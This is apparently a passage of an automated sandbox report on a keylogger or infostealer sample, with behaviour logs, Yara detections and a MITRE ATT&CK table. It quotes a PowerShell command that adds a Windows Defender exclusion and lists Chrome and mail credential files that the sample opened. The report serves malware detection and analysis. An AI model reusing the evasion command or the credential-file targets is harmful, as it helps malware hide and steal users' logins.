                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 2130000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 4130000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 5860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 6860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 69B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 79B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 2480000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: 340000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1744Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4194Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeWindow / User API: threadDelayed 9634Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3292Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3680Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3668Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3740Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3740Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3744Thread sleep count: 190 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe TID: 3744Thread sleep count: 9634 > 30Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3812Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C7200 LdrInitializeThunk,9_2_001C7200
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMemory written: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeQueries volume information: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeQueries volume information: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts33
                Exploitation for Client Execution                		Boot or Logon Initialization Scripts111
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		14
